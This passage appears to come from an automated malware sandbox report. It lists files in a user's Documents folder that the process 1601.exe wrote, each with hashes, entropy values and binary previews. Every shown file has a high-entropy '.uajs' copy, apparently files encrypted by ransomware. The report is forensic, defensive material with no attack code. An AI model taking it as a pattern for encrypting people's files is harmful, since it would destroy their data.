SHA-256:	36375BAC69F5657EC112A264BDA82B03EAC94FF471526855FED515D8F1CCA917
SHA-512:	44190A74AB50986B8611C0532C9CA692F9A758998A0A516FD0DCE7BA9384A112872CE27949BCE5FC0F2523B60188F2B0FC7424FCE6FB80F8DC67281EEA107F00
Malicious:	false
Preview:	DUUDT.t..I..........9.C..>}CC..@...N........vl.1..n...MY./........0.....G~..x...GF.IAVB....1....FC.8..6.P.%.g.X\...N.[...c....z..a...X..e...]'0..]V.&.K(Q...#8.>!.....[.....$Z....>...Q.4....e$..-.!CbXP..9u.x......B-.;..[E......W...Q;...nd.#.~...."..<7..+...YFRk.:..GS.a..jF,.W.....d..o....Zw...Qi.m..,D....b..K.....@........]c=0i..s2..6c.D.%z...QN.n...vF..N.c.R.o.Spz......B..9.........!..P.<.fNh....<...\.@.w.~.gjl.c...U....f..\Hr..m.....9".......b........._..G..(.j....q..E.....&..1....i..i...6$z.v..mS.U,.A....ED}.%3.j.q.....n........L...1."......)..M.....=L. ...1.2....S.(.m.)q@....#...).t.....b......!X.=..x..$..0...N.._.1....N.H..^.Z?qS..=-.....Ck2.Gn...0,.7.....7E.9[.......u.l....\|~.L..E...?..l..T..3.....(F...).^...b.....]..d..ux..r..>...cR.2..$..u.;3!Xr:Ql....+...+.X0?....z.....`D.....)9v..!..,1.n..m..1.97f.S.K?e.........v.\|Y..E.?c.....N.Qu..".....V.y.k.H..0r...}8n..}...1..?..F.:+.*M._H..V_.....e..n....Xk...9L.m.N...75H.Z

C:\Users\user\Documents\PALRGUCVEH\EIVQSAOTAQ.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840152689227882
Encrypted:	false
SSDEEP:	24:RAJOY4jvSa2MhZp9v/9gt7Pb5V+kXvS7axiPsaU9HRBxJMEfUHM+aGuTx/eYww1X:eJHMq8Zp9vyxdVbgbPsagX/5fkM+aTZz
MD5:	266643E07D87A7A5D602D89E404E142F
SHA1:	EF898D3AAA27B5E2AEDFB2F3A7D0DE300AAD7CEE
SHA-256:	1FB026990BB01173AF535C5D91E25A67D5F0FCC8E968535D1D625EDAC41171F8
SHA-512:	65B7CF670678604520DAA89D6B740FDE92F1C2CD7F1208018F9EC0C1669F449E69A87F54E2578F7022A841EB8F45CA20E81BDBC09816DDDD8D738E23047A0912
Malicious:	false
Preview:	EIVQS.j(..NI....%.7...;sE...h.....)...k......?,..]....%...EI..;..n..$;/.=.'......y...\.3...b....\|U.%.p...yx..,..[Ud.j.zs....k...#:.Y.^....~.....t.\|.......p..Z.B...&0..Z...e?NJ....NE....E).E&.Jd.h.%?.B.v.h...R.b..I'..t...hi...\|.OU..."...O<..\F....0mp.......Tb6......U.".U....cz6A.X0..1:.5/..'..k.T.y..V.....Q.._...A?..B..$F..{....y..6.E..D.."s.....,...A.,!1..=v."H<J...UhB.=.j...HO.Kk....B..<....r./....ATm^.]-.-...?.#`...JT"....+v...oU.QC....z..Ree...m; '].E.cRZ....v%S..MV..,..F^.3.$...F..@;J...O.....WU..%.Kl.D.cDR<w....b..h.+wTxHz.1/..'T.".....g..........>..]..;...z.. TCN...XR .....c.t....p."^?...1.'rZ.1\|...,x.y....su.{..{:ra@..+K.!.....#...;.~.....F8Ld.N.E...%X...+.:..........'?"...~..Ue.9U......Qk...0...5U....m...........m.2)C..O.dO...>..... ..n...aO.Y....M..u..N..-#.'...t.tH...?dED..eL0nz\|K..B........x./A.Rd.L.7..!~O.b.e.....zj2..yc..P..E6..:.=Q.4.X$......Po..I..!.:J.B.1T.,.E.<.,].@.K.o..79W.o....t......a.h..P..[.'..@.R....Z2..EP~.Mr.*.

C:\Users\user\Documents\PALRGUCVEH\EIVQSAOTAQ.png.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840152689227882
Encrypted:	false
SSDEEP:	24:RAJOY4jvSa2MhZp9v/9gt7Pb5V+kXvS7axiPsaU9HRBxJMEfUHM+aGuTx/eYww1X:eJHMq8Zp9vyxdVbgbPsagX/5fkM+aTZz
MD5:	266643E07D87A7A5D602D89E404E142F
SHA1:	EF898D3AAA27B5E2AEDFB2F3A7D0DE300AAD7CEE
SHA-256:	1FB026990BB01173AF535C5D91E25A67D5F0FCC8E968535D1D625EDAC41171F8
SHA-512:	65B7CF670678604520DAA89D6B740FDE92F1C2CD7F1208018F9EC0C1669F449E69A87F54E2578F7022A841EB8F45CA20E81BDBC09816DDDD8D738E23047A0912
Malicious:	false
Preview:	EIVQS.j(..NI....%.7...;sE...h.....)...k......?,..]....%...EI..;..n..$;/.=.'......y...\.3...b....\|U.%.p...yx..,..[Ud.j.zs....k...#:.Y.^....~.....t.\|.......p..Z.B...&0..Z...e?NJ....NE....E).E&.Jd.h.%?.B.v.h...R.b..I'..t...hi...\|.OU..."...O<..\F....0mp.......Tb6......U.".U....cz6A.X0..1:.5/..'..k.T.y..V.....Q.._...A?..B..$F..{....y..6.E..D.."s.....,...A.,!1..=v."H<J...UhB.=.j...HO.Kk....B..<....r./....ATm^.]-.-...?.#`...JT"....+v...oU.QC....z..Ree...m; '].E.cRZ....v%S..MV..,..F^.3.$...F..@;J...O.....WU..%.Kl.D.cDR<w....b..h.+wTxHz.1/..'T.".....g..........>..]..;...z.. TCN...XR .....c.t....p."^?...1.'rZ.1\|...,x.y....su.{..{:ra@..+K.!.....#...;.~.....F8Ld.N.E...%X...+.:..........'?"...~..Ue.9U......Qk...0...5U....m...........m.2)C..O.dO...>..... ..n...aO.Y....M..u..N..-#.'...t.tH...?dED..eL0nz\|K..B........x./A.Rd.L.7..!~O.b.e.....zj2..yc..P..E6..:.=Q.4.X$......Po..I..!.:J.B.1T.,.E.<.,].@.K.o..79W.o....t......a.h..P..[.'..@.R....Z2..EP~.Mr.*.

C:\Users\user\Documents\PALRGUCVEH\EOWRVPQCCS.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.839892594791865
Encrypted:	false
SSDEEP:	24:fXCI/NP+R9hby9sTew26Wjg/MlfJM52UfWhaCHeYdC0gBhsqlkw1bD:fXCOVu9QsQs/MlfJ6zYhgBJkyD
MD5:	DB3936C65DF2BF5628346C081475BA99
SHA1:	E798806FC40AF0E5CFB329D61C3A448FA9C4E313
SHA-256:	B67EBD5071331AAF96E44FDCB942840E61D0D69C64A9E8F6E64C602CD2AEFD08
SHA-512:	9D6CB87EFCA4C5B4625FAF38CBD956817402D0ED3D73B10EC7E37CFE3791E867A91DA482C48740550AFC3232923EF40563765BC728303E6DD0C20B62E116017D
Malicious:	false
Preview:	EOWRVGe(rA......<....C..0s..T..F}.:k...>..6. ..p.i...k...6...(...Z2..K...o.o.TG..+!e.q..S....5s#.'X.gM#....c....93J..6(...8.\..b....r.U..+.}.`.U.h.9e).\....w&m[..Y.B...@...L.N.........x...=..$JZ..OS\|....5...i..g...(.Zy..........ia~.x..U....Po.<.....a..#..........2..q......s..h...}z.&...4N2....9.j......}..\|h......5f...>l...\.._.r..ro%......f.!.*.....5.-.v.......><.\.......).......UP;8..Y..1.b..T.V.3h.LQ(.<9.CL..vV.\|.g..N...i...Q.k...8...tv.........!P.x...g.Dn.......-.....E...s..:.....{.`.f..c..fG.}gRn..i.m..$z}r$.....>.......l.$.........6ob...M..w.1.:......_...{...f.{y.....Z&..;;.....(.]....` . ...w.....Jb.S.....!....l...-..}....s....1...g.:......@...o%.M.LR]R..w..3..1..X5.\...bS..z.<..L.!1.~.K.....{>...+......./Y.....V..._:F8.....)3..h....Z..'.(5..'..X......z.w...sJ5}..S....(...S,y..^.?....cI..!F/.X....EG....g.i..R...c.y..L.%5.\...}y}L#.w..._=.h.......Av Q+r..."..O...Z_...7...P.GR...c.-...e&...@A5.....0O..K5..<.t.-f......(.c.

C:\Users\user\Documents\PALRGUCVEH\EOWRVPQCCS.pdf.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.839892594791865
Encrypted:	false
SSDEEP:	24:fXCI/NP+R9hby9sTew26Wjg/MlfJM52UfWhaCHeYdC0gBhsqlkw1bD:fXCOVu9QsQs/MlfJ6zYhgBJkyD
MD5:	DB3936C65DF2BF5628346C081475BA99
SHA1:	E798806FC40AF0E5CFB329D61C3A448FA9C4E313
SHA-256:	B67EBD5071331AAF96E44FDCB942840E61D0D69C64A9E8F6E64C602CD2AEFD08
SHA-512:	9D6CB87EFCA4C5B4625FAF38CBD956817402D0ED3D73B10EC7E37CFE3791E867A91DA482C48740550AFC3232923EF40563765BC728303E6DD0C20B62E116017D
Malicious:	false
Preview:	EOWRVGe(rA......<....C..0s..T..F}.:k...>..6. ..p.i...k...6...(...Z2..K...o.o.TG..+!e.q..S....5s#.'X.gM#....c....93J..6(...8.\..b....r.U..+.}.`.U.h.9e).\....w&m[..Y.B...@...L.N.........x...=..$JZ..OS\|....5...i..g...(.Zy..........ia~.x..U....Po.<.....a..#..........2..q......s..h...}z.&...4N2....9.j......}..\|h......5f...>l...\.._.r..ro%......f.!.*.....5.-.v.......><.\.......).......UP;8..Y..1.b..T.V.3h.LQ(.<9.CL..vV.\|.g..N...i...Q.k...8...tv.........!P.x...g.Dn.......-.....E...s..:.....{.`.f..c..fG.}gRn..i.m..$z}r$.....>.......l.$.........6ob...M..w.1.:......_...{...f.{y.....Z&..;;.....(.]....` . ...w.....Jb.S.....!....l...-..}....s....1...g.:......@...o%.M.LR]R..w..3..1..X5.\...bS..z.<..L.!1.~.K.....{>...+......./Y.....V..._:F8.....)3..h....Z..'.(5..'..X......z.w...sJ5}..S....(...S,y..^.?....cI..!F/.X....EG....g.i..R...c.y..L.%5.\...}y}L#.w..._=.h.......Av Q+r..."..O...Z_...7...P.GR...c.-...e&...@A5.....0O..K5..<.t.-f......(.c.

C:\Users\user\Documents\PALRGUCVEH\EWZCVGNOWT.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.864101936889278
Encrypted:	false
SSDEEP:	24:b2p0CjPXdFWErWNyjim7i3FqdpkfNfuudwfr+SPiAlyxCVPVTvZ92cB8w1bD:00OwEfi51qdpuuuwz+qiA0aVTb2C8yD
MD5:	B6073FC883C8CAB25FA008C2F79E107D
SHA1:	770969E22AF49185EB3845F867D05072BAFA7BA8
SHA-256:	28895929DD5B93A18B89ECFB60F24D1B80B8341591045295F216C7C4740FBEA8
SHA-512:	D156156B9FAAFAA906B56B5809F63CA400A59601E964DDB25AECFB4F69D41214AF3991F47531BE19400DBB24F48D00381F49BFD16A8A47EA5775948A2F7053FE
Malicious:	false
Preview:	EWZCVakj}....v..mK..#h...y..D....[e=6.J.&.B.%z.l...$q.....bM.....d.8..h"...w.....4..H."....K.+.....m...<74E......zR0'.k....\...j..i....KT.}.q/....!..MF......S..:..u.s.D.*./..X(..%..u3.}n.8A.j...L.X.W:.4.8.Xx/.........._...x..94.`.Z..........a.h...2K+.4.....#DQ.....<.H..&..r!#.3%..XS......$..hu......c.......}J.X...8j.(......p....W....z{....\|...W.i#.......'.<.r.{=2.1....s..).-...\|w...5.k.n?.#-..L.]..KPw..H\|..=h..Kus.fIN........j.}..N..`.+... ...X...H..].A8.+.G...E...xrR.....j....\|l..L..8........`..N..4..<\|.4.g[.3..z...06.c.].....fz.4\.Q\|.....i.w.9..!.`_.n... .H..Pa..[??.\b..... ..d.<.XY....../.-'2....a.......f......1<.0.\|..B.W.._..2....$...)....\e..+.b./.f..e.[..f..i$...E..&.x...{.s..........h.........B.;..u.}..W.J..%.L"P.....n......r9...V.~...=}..~..l..$e..!..,R...1....m..V...p.b...^.t...VD. 6J.+.6B.6.{......y......Hcw.=.o.SCG.\|.U..wN.... K4...N....?..h.....hn..v...f{..Y.......49c.-cR.m..l.q.:...8?... .V.....D../.J.G....#..d.._...

C:\Users\user\Documents\PALRGUCVEH\EWZCVGNOWT.mp3.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.864101936889278
Encrypted:	false
SSDEEP:	24:b2p0CjPXdFWErWNyjim7i3FqdpkfNfuudwfr+SPiAlyxCVPVTvZ92cB8w1bD:00OwEfi51qdpuuuwz+qiA0aVTb2C8yD
MD5:	B6073FC883C8CAB25FA008C2F79E107D
SHA1:	770969E22AF49185EB3845F867D05072BAFA7BA8
SHA-256:	28895929DD5B93A18B89ECFB60F24D1B80B8341591045295F216C7C4740FBEA8
SHA-512:	D156156B9FAAFAA906B56B5809F63CA400A59601E964DDB25AECFB4F69D41214AF3991F47531BE19400DBB24F48D00381F49BFD16A8A47EA5775948A2F7053FE
Malicious:	false
Preview:	EWZCVakj}....v..mK..#h...y..D....[e=6.J.&.B.%z.l...$q.....bM.....d.8..h"...w.....4..H."....K.+.....m...<74E......zR0'.k....\...j..i....KT.}.q/....!..MF......S..:..u.s.D.*./..X(..%..u3.}n.8A.j...L.X.W:.4.8.Xx/.........._...x..94.`.Z..........a.h...2K+.4.....#DQ.....<.H..&..r!#.3%..XS......$..hu......c.......}J.X...8j.(......p....W....z{....\|...W.i#.......'.<.r.{=2.1....s..).-...\|w...5.k.n?.#-..L.]..KPw..H\|..=h..Kus.fIN........j.}..N..`.+... ...X...H..].A8.+.G...E...xrR.....j....\|l..L..8........`..N..4..<\|.4.g[.3..z...06.c.].....fz.4\.Q\|.....i.w.9..!.`_.n... .H..Pa..[??.\b..... ..d.<.XY....../.-'2....a.......f......1<.0.\|..B.W.._..2....$...)....\e..+.b./.f..e.[..f..i$...E..&.x...{.s..........h.........B.;..u.}..W.J..%.L"P.....n......r9...V.~...=}..~..l..$e..!..,R...1....m..V...p.b...^.t...VD. 6J.+.6B.6.{......y......Hcw.=.o.SCG.\|.U..wN.... K4...N....?..h.....hn..v...f{..Y.......49c.-cR.m..l.q.:...8?... .V.....D../.J.G....#..d.._...

C:\Users\user\Documents\PALRGUCVEH\PALRGUCVEH.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.863310578896441
Encrypted:	false
SSDEEP:	24:QqrQM5FfsC0gx+eiNb/FLKzTQAP5Zfd5NUSfjyAWem0UgMTjKtj+aRGofw1bD:QqrQ2VG/FWn/P5ZfdYSfjyGrsOtnRvfa
MD5:	E7EA8C56932BEF2E3614FC4AA079E49D
SHA1:	C0AE240D1933E121C4335CC6928CE0718B8FBEFE
SHA-256:	06111011156186C3A9D98515E06F1D213BFC184F9F65E7558CB8C2FA64E01743
SHA-512:	57D5FDECCCCFC61361D6F8B1DE0BC4EA535A3F09D47E6906D948047D32C0151A89C9A512F0C29D580489FD97A73D84F6A1F901B5E2459D56AE59F1C33377643D
Malicious:	false
Preview:	PALRG....f...<.:O...s...i.)<....D.f.5.o.YZX.....m..e..l......kq0.@..J..../.......=.2.:v..+Y..kZ.....}vsL3.w.v...v,..._.+v2....Id0?E..T:...h\|^;..3..>...k6U.s\|.JP\ \|4.a1..J..a8.....+....CJ.B"g.....9W.T...e=S.L..eY_.....pp.Y.K ..O....s.:.....O.3.....!t.5..V..T.........C..[bH1.[...&.>..A.?...U....m..T5&.{.\.1..!5f..}[.L&.'.q..a.....N...=...NC.[N..v.IQO.;..In....M.)%...K......q....P..?.9Z..wsg.h.w....1.\|T.....-.i..E{...,>.1..(q././..V.QJ.H...@....6.....j......%.9.=#@. .,...}o....Re..i...+..4q. .E1..../....\|..R~\e..p.@U..A.Y4..L.....=}.p..Ks.~.k.j..nqB..(.....Q..'b(%.!...J.w..iHM^.`...D.`.t......8...Z8~.).9(.k...oQ..qF.0'Fw..;.X+ZX.......U9b..CgJ)..(...gD~....h.@..k..<....n.....Uf...w#D..x9.K.W..D..].C........J....".w.7.py....^DR%....{....~F..O.....s..>..R...f6G.>..U\|-&U.f..E..h.....JS../O^~..K.= ..5Jr..F8q#..:s{.....6.K(..Lc*..v....zq..!.%.[..~..fK...p$.y..]%...&....4Y.[.]L\|I..i..{..1.i.................\.......A..i.PG].....b.$^..a..Z.l..

C:\Users\user\Documents\PALRGUCVEH\PALRGUCVEH.docx.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.863310578896441
Encrypted:	false
SSDEEP:	24:QqrQM5FfsC0gx+eiNb/FLKzTQAP5Zfd5NUSfjyAWem0UgMTjKtj+aRGofw1bD:QqrQ2VG/FWn/P5ZfdYSfjyGrsOtnRvfa
MD5:	E7EA8C56932BEF2E3614FC4AA079E49D
SHA1:	C0AE240D1933E121C4335CC6928CE0718B8FBEFE
SHA-256:	06111011156186C3A9D98515E06F1D213BFC184F9F65E7558CB8C2FA64E01743
SHA-512:	57D5FDECCCCFC61361D6F8B1DE0BC4EA535A3F09D47E6906D948047D32C0151A89C9A512F0C29D580489FD97A73D84F6A1F901B5E2459D56AE59F1C33377643D
Malicious:	false
Preview:	PALRG....f...<.:O...s...i.)<....D.f.5.o.YZX.....m..e..l......kq0.@..J..../.......=.2.:v..+Y..kZ.....}vsL3.w.v...v,..._.+v2....Id0?E..T:...h\|^;..3..>...k6U.s\|.JP\ \|4.a1..J..a8.....+....CJ.B"g.....9W.T...e=S.L..eY_.....pp.Y.K ..O....s.:.....O.3.....!t.5..V..T.........C..[bH1.[...&.>..A.?...U....m..T5&.{.\.1..!5f..}[.L&.'.q..a.....N...=...NC.[N..v.IQO.;..In....M.)%...K......q....P..?.9Z..wsg.h.w....1.\|T.....-.i..E{...,>.1..(q././..V.QJ.H...@....6.....j......%.9.=#@. .,...}o....Re..i...+..4q. .E1..../....\|..R~\e..p.@U..A.Y4..L.....=}.p..Ks.~.k.j..nqB..(.....Q..'b(%.!...J.w..iHM^.`...D.`.t......8...Z8~.).9(.k...oQ..qF.0'Fw..;.X+ZX.......U9b..CgJ)..(...gD~....h.@..k..<....n.....Uf...w#D..x9.K.W..D..].C........J....".w.7.py....^DR%....{....~F..O.....s..>..R...f6G.>..U\|-&U.f..E..h.....JS../O^~..K.= ..5Jr..F8q#..:s{.....6.K(..Lc*..v....zq..!.%.[..~..fK...p$.y..]%...&....4Y.[.]L\|I..i..{..1.i.................\.......A..i.PG].....b.$^..a..Z.l..

C:\Users\user\Documents\PALRGUCVEH\ZGGKNSUKOP.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.870020647252314
Encrypted:	false
SSDEEP:	24:f8BNzSqvT0U3CwThFlXmIayfjiOmbEf28r/AWEv3XLtPuFTIG0CJdat9xF3DvM72:kfkU3CM0Ia+iOmbqr/REDnG0CJ0xRjM6
MD5:	35979C2CE375390DCD283819EE097E03
SHA1:	D858B98859B9B391821DA06661A1B19D0A2BD875
SHA-256:	9DAE7AC65F966A05407BD4060B3E185635FEDBD4C177C53597136D17F2B71536
SHA-512:	D0E8A1AA8688F9E04F3E3E3D0FA0901AD7DE5798642F6AAE3153E3B5B51911EA18AD4E57489FD413AAAB95471F06459F5880805C42FA600A7E053D277720ECF7
Malicious:	false
Preview:	ZGGKN.......Z.Fl...~.t...s....?.`?.O.%&n!.$s......"...J..BEh..5$.4.....7\|5.^..E.i.[.D.Z(...vE.!......u..=..@;.G}..?.<1.Th...h.H....@..gq.q;..&.Q.Q....B@......T.K..&.....'...s..Z...s......R5_..y..6V\b.X.;,....KX.....+..b.C.}^..5L..0....Q.vov...KdQ7~.8/.........Z.H.......T%^.....C~p.X..N....VY.h>.I.D.1.Zm.....o..n....vd.......V8J."...?0...i..`a.kT......r....wr..e..SDp.3'..._.Om/...Z.].'.{3..\|.t....5/..:..R..(......UAY.e........#.5/..?...I....-....j\|l9V..'..$.[........L.p...T/..K.\|o....BC.>.}.O..~=....r........QK<....#.?3.f.u...!1.S..p.Q...`.z.A.....34..xE........!...w.&..(...^...5A..:x.n..-..........7.J.....[B.Q._p.pT4e+qw..!*..1.....#.,..X$..rX...wy../0f...G..n.....\.]..>u..d..Y[....1}..a.Y.R...N.W.2.b&:c'..9ZH. 2.t.(h...>...)A-..P.?Nq..1.'..'qX...r..k.dM..o.4.;q!....@..)R..}.0.2.0..$...O......Z..S..."~..J..d.b.U.C.3.^..>.=_s6.O............\|].(.?......v...s..7A.W..+.fE+...&.f-&...q.;..E...n.`..[_.t.R...D..2.^...}[......l.{Oa.K.'.C.....[@q.. .

C:\Users\user\Documents\PALRGUCVEH\ZGGKNSUKOP.jpg.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.870020647252314
Encrypted:	false
SSDEEP:	24:f8BNzSqvT0U3CwThFlXmIayfjiOmbEf28r/AWEv3XLtPuFTIG0CJdat9xF3DvM72:kfkU3CM0Ia+iOmbqr/REDnG0CJ0xRjM6
MD5:	35979C2CE375390DCD283819EE097E03
SHA1:	D858B98859B9B391821DA06661A1B19D0A2BD875
SHA-256:	9DAE7AC65F966A05407BD4060B3E185635FEDBD4C177C53597136D17F2B71536
SHA-512:	D0E8A1AA8688F9E04F3E3E3D0FA0901AD7DE5798642F6AAE3153E3B5B51911EA18AD4E57489FD413AAAB95471F06459F5880805C42FA600A7E053D277720ECF7
Malicious:	false
Preview:	ZGGKN.......Z.Fl...~.t...s....?.`?.O.%&n!.$s......"...J..BEh..5$.4.....7\|5.^..E.i.[.D.Z(...vE.!......u..=..@;.G}..?.<1.Th...h.H....@..gq.q;..&.Q.Q....B@......T.K..&.....'...s..Z...s......R5_..y..6V\b.X.;,....KX.....+..b.C.}^..5L..0....Q.vov...KdQ7~.8/.........Z.H.......T%^.....C~p.X..N....VY.h>.I.D.1.Zm.....o..n....vd.......V8J."...?0...i..`a.kT......r....wr..e..SDp.3'..._.Om/...Z.].'.{3..\|.t....5/..:..R..(......UAY.e........#.5/..?...I....-....j\|l9V..'..$.[........L.p...T/..K.\|o....BC.>.}.O..~=....r........QK<....#.?3.f.u...!1.S..p.Q...`.z.A.....34..xE........!...w.&..(...^...5A..:x.n..-..........7.J.....[B.Q._p.pT4e+qw..!*..1.....#.,..X$..rX...wy../0f...G..n.....\.]..>u..d..Y[....1}..a.Y.R...N.W.2.b&:c'..9ZH. 2.t.(h...>...)A-..P.?Nq..1.'..'qX...r..k.dM..o.4.;q!....@..)R..}.0.2.0..$...O......Z..S..."~..J..d.b.U.C.3.^..>.=_s6.O............\|].(.?......v...s..7A.W..+.fE+...&.f-&...q.;..E...n.`..[_.t.R...D..2.^...}[......l.{Oa.K.'.C.....[@q.. .

C:\Users\user\Documents\QCOILOQIKC.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8409398290116625
Encrypted:	false
SSDEEP:	24:UCPdBGvaX/hvRyNOoRs1iY6NW6TjdrN7Dzu1aEMtPdWUJNNjFw1bD:favShRh/76NvT7+1OP4UJNNjFyD
MD5:	23B03410974A1FD7A2EA7C513E082D3F
SHA1:	B6349D26DAE94EBF97AC83C8D4D3B4D9AA9181F9
SHA-256:	80F4191B1C90B16F7F0DB67E049444CE6B0473D60D73A2DF8D6AC6E37A271549
SHA-512:	D82C46C987DF42BFA0FC26CC74BC3B539FFFB0A7CDF759E83856163701AEAA94EF51315B3D2B63D1659B098B954A42BFA2A9461661F18621E237CCD4C1D1E1C0
Malicious:	false
Preview:	QCOIL...W.'..V.Ko..9H..{...NQ~.aA......[.9[...q.:k8..]..G-.."....&k..r.7.t.....!6E...*!C..;.9vs.t.E.h:H;..]..l.Yi.....6...ynD..A\..&._.i.-....k.i.X..../.......2.. .d08.C..0......k'i...O../....o...R{u..6.\|/"MKa.z...n..$..H.v...y.4`...<.....A_....g..H.hhK&.N......kw4......0"....p....H".B...5Tu/.....u......8!..._{.h4."6X...K.Z<.V...@$.{....{.3.<..>.h.l....JQ.L.J.i...r.......p......{...Uo+..#MYE...m..'.H.'0.;.....\..L..g.0...~K....-......s.x.....0.1.E..MM....CY...7..Wp.......$C4....Tq....t$.$...O....4......'..3?t.W...m{`......d.O.j[.....Y#..f...L^BS.....D-.}K.W......"..6M..J..,6.:.9..0d...3....dI...m.].x'l. ........q9.$..oq.<6..d=h.....xK..Kx..Qn..5....f :O.a...S#=...T....'8...-/.T`...[u..d..s...u...=4B ..\|.u#.V...".>}....J...H.....C.^;.!..@..J......JcM..4q.$.R..".}u..g........6.t.n....@..T.`.1......z....<........j...s.W.+-.>..Y4[...@\.r~..J.J..l6.!..(...Vp....`0,@.f...f.P....s.z../......t..q.Huzc.......} .I.^..\|.v..iq...9..:.........

C:\Users\user\Documents\QCOILOQIKC.png.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8409398290116625
Encrypted:	false
SSDEEP:	24:UCPdBGvaX/hvRyNOoRs1iY6NW6TjdrN7Dzu1aEMtPdWUJNNjFw1bD:favShRh/76NvT7+1OP4UJNNjFyD
MD5:	23B03410974A1FD7A2EA7C513E082D3F
SHA1:	B6349D26DAE94EBF97AC83C8D4D3B4D9AA9181F9
SHA-256:	80F4191B1C90B16F7F0DB67E049444CE6B0473D60D73A2DF8D6AC6E37A271549
SHA-512:	D82C46C987DF42BFA0FC26CC74BC3B539FFFB0A7CDF759E83856163701AEAA94EF51315B3D2B63D1659B098B954A42BFA2A9461661F18621E237CCD4C1D1E1C0
Malicious:	false
Preview:	QCOIL...W.'..V.Ko..9H..{...NQ~.aA......[.9[...q.:k8..]..G-.."....&k..r.7.t.....!6E...*!C..;.9vs.t.E.h:H;..]..l.Yi.....6...ynD..A\..&._.i.-....k.i.X..../.......2.. .d08.C..0......k'i...O../....o...R{u..6.\|/"MKa.z...n..$..H.v...y.4`...<.....A_....g..H.hhK&.N......kw4......0"....p....H".B...5Tu/.....u......8!..._{.h4."6X...K.Z<.V...@$.{....{.3.<..>.h.l....JQ.L.J.i...r.......p......{...Uo+..#MYE...m..'.H.'0.;.....\..L..g.0...~K....-......s.x.....0.1.E..MM....CY...7..Wp.......$C4....Tq....t$.$...O....4......'..3?t.W...m{`......d.O.j[.....Y#..f...L^BS.....D-.}K.W......"..6M..J..,6.:.9..0d...3....dI...m.].x'l. ........q9.$..oq.<6..d=h.....xK..Kx..Qn..5....f :O.a...S#=...T....'8...-/.T`...[u..d..s...u...=4B ..\|.u#.V...".>}....J...H.....C.^;.!..@..J......JcM..4q.$.R..".}u..g........6.t.n....@..T.`.1......z....<........j...s.W.+-.>..Y4[...@\.r~..J.J..l6.!..(...Vp....`0,@.f...f.P....s.z../......t..q.Huzc.......} .I.^..\|.v..iq...9..:.........

C:\Users\user\Documents\TQDFJHPUIU.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.823525191293648
Encrypted:	false
SSDEEP:	24:PCuin8QM/6m0iNGuWzl/L0JA/BqoysN3kFAQ3ZoZvw1bD:yuT0i8uq/DLH3kFLJoZvyD
MD5:	3CE47F9B65B162AB8BADD1339CCDD412
SHA1:	48EDC263A56ED450CBCD3FC54D6160B0DB7AC3FB
SHA-256:	15DBA676BB893CC6A703F7DAA170DFF396131463AB8C86AFC0D2606BF34E0462
SHA-512:	8BBCF6C63B7C7A00FD02AA97E03DFD7E3CA2946030F530DDB60CDA75303B1E13ADA02DDE02D2B80CD01FD613EE09CC0D34E04B1E78D5B5C677D0AC15AC39E45D
Malicious:	false
Preview:	TQDFJ.4bE....UW.. 2.8...8..\.9..7.......L{T.W.Q..ga.................b.j$Z.f......X.9.....Qz....1Y. t.v.=D..ST.bn.e%....>.'.lJ..F.b.M....q..I)..G`t..KP.....~-...WW}f.DW<.5.dR...vI@.!x.(....#...r...kp..h....S.....+...%./.8..g........Y..</...o.eO.`..F..y...A.c...9.X.;A.g...k..?.-...J .S.o...;.J..z.U..QE.{j_.o.......uW......9M..s..Z._S.9C[..EFs.un>].M.xE....-$.(.8R.a...<..4.7...[..3...GU...._~.E_.Fs.J..._..\....a..l.(...>II8..Q.=bb)eH..,...t@..7E..o.V.'.g...Xr.;...T...oU.B#rez:`..n%.$..l..N.mC... ...#..}.......d..eA.`m...7.b..2.....Y.T...S..k1.R......./..g (....l.w.gr3.._.l4M.....Qq.yc..`o..[........~Z..9B.J...n...6."......JN....G.I.0I..p..o...0..H1.....=k;.E.=....'0.....j4G...f...x...}..[F[...R..TO ........b.....q2..Cq......r2..kp.............o..lv..,........a.....n.^~_.4.-.....A.Ce.-k'..XiA.rM..]@j....}a=."...&[.8.;.K..K...u........<=..>..,c~.8>>u..X....3.o..4Tj<mg2..0D,..M.c.@}....lC..8zm,q.#..I;.....v..m^.........@.%......GRHo..h$b

C:\Users\user\Documents\TQDFJHPUIU.jpg.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.823525191293648
Encrypted:	false
SSDEEP:	24:PCuin8QM/6m0iNGuWzl/L0JA/BqoysN3kFAQ3ZoZvw1bD:yuT0i8uq/DLH3kFLJoZvyD
MD5:	3CE47F9B65B162AB8BADD1339CCDD412
SHA1:	48EDC263A56ED450CBCD3FC54D6160B0DB7AC3FB
